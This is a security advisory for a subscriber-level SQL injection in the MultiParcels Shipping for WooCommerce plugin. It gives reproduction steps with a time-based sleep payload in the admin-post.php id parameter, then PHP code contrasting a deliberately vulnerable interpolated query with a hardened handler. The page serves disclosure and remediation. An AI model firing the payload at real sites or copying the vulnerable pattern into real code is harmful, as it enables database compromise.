Source: wpexploit
Author: Dao Xuan Hieu
WPEX-ID: 8E713EAF-F332-47E2-A131-C14222201FDC
History: Jul 17, 2023 - 12:00 a.m.

MultiParcels Shipping For WooCommerce < 1.14.15 - Subscriber+ SQLi

Tags: woocommerce plugin, multiparcels shipping, sql injection, subscriber user, admin-post request, vulnerable plugin, exploit, security vulnerability

AI Score: 9 (High), Confidence: High
EPSS: 0.001 (Low), Percentile: 19.9%

Description: The plugin does not properly sanitize and escape a parameter before using it in an SQL statement, which could allow any authenticated user, such as a subscriber, to perform SQL Injection attacks. Note (WPScan): The issue was fixed in 1.14.13, however a better patch was done in 1.14.15 as per our suggestion.

1. Install the WooCommerce plugin (dependency, no setup required) and the vulnerable plugin MultiParcels Shipping For WooCommerce version 1.14.12 (no setup required).

2. Log in as a Subscriber user, visit this URL and intercept the request: http://example.com/wp-admin/admin-post.php?action=multiparcels_delete_shipping&id=1

3. Inject the payload into the id parameter, for example: GET /wp-admin/admin-post.php?action=multiparcels_delete_shipping&id=(select*from(select(sleep(10)))a) HTTP/1.1
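The root cause described above is a generic WordPress admin-post.php anti-pattern: the hook fires for any logged-in user, and a request parameter is dropped straight into a query. The following is an added illustration written for this page, not MultiParcels' own code (the plugin's source is not reproduced here). The handler name `mp_demo_delete_shipping`, the table name `multiparcels_shipments`, the capability `manage_woocommerce` and the nonce action are all assumptions chosen for the demonstration. It places a reconstruction of the vulnerable pattern beside a hardened handler that adds a capability check, a nonce check, integer validation and a parameterised query.

```php
<?php
// Added example for this advisory page; not the plugin's code.
// Handler name, table name, capability and nonce action are assumptions.

// --- Vulnerable pattern (reconstruction of what the description names) ---
// Shown for contrast only; never register it with add_action().
// The id parameter is interpolated into the SQL string, so any logged-in
// user who can reach admin-post.php controls the WHERE clause.
function mp_demo_delete_shipping_vulnerable() {
    global $wpdb;
    $id    = $_GET['id'];                                     // untrusted, unsanitised
    $table = $wpdb->prefix . 'multiparcels_shipments';        // assumed table name
    $wpdb->query( "DELETE FROM {$table} WHERE id = {$id}" );  // string interpolation -> SQLi
    wp_safe_redirect( wp_get_referer() ?: admin_url() );
    exit;
}

// --- Hardened pattern ---
function mp_demo_delete_shipping_hardened() {
    global $wpdb;

    // 1. Authorisation: the admin_post_{action} hook runs for *every* logged-in
    //    user, so the handler itself must check capability. A Subscriber fails here.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_die( esc_html__( 'You are not allowed to do that.', 'mp-demo' ), 403 );
    }

    // 2. CSRF: require a nonce tied to this specific action (checks _wpnonce).
    check_admin_referer( 'mp_demo_delete_shipping' );

    // 3. Input validation: id must be a positive integer. The payload from step 3
    //    above collapses to 0 under absint() and is rejected before reaching SQL.
    $id = isset( $_GET['id'] ) ? absint( wp_unslash( $_GET['id'] ) ) : 0;
    if ( 0 === $id ) {
        wp_die( esc_html__( 'Invalid shipment id.', 'mp-demo' ), 400 );
    }

    // 4. Parameterised query: %d forces an integer and $wpdb->prepare() does the
    //    escaping, so the value can never alter the statement's structure even if
    //    validation were somehow bypassed. This is the layer that matters most.
    $table = $wpdb->prefix . 'multiparcels_shipments'; // assumed table name
    $wpdb->query( $wpdb->prepare( "DELETE FROM {$table} WHERE id = %d", $id ) );

    wp_safe_redirect( wp_get_referer() ?: admin_url() );
    exit;
}
add_action( 'admin_post_mp_demo_delete_shipping', 'mp_demo_delete_shipping_hardened' );

// Link generator the UI would use, so the nonce check above can pass for
// legitimate, capability-holding users.
function mp_demo_delete_shipping_url( $shipment_id ) {
    $url = admin_url( 'admin-post.php?action=mp_demo_delete_shipping&id=' . absint( $shipment_id ) );
    return wp_nonce_url( $url, 'mp_demo_delete_shipping' );
}
```

Of the four layers, the capability check is what removes the Subscriber+ reachability this advisory is rated on, and `$wpdb->prepare()` with `%d` is what makes the SQL injection itself impossible regardless of who calls the handler; the note that a "better patch" landed in 1.14.15 is consistent with tightening the query rather than relying on input filtering alone. On the detection side, requests to `admin-post.php` whose `id` parameter contains anything other than digits are a cheap, low-noise signal to alert on in web server or WAF logs.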

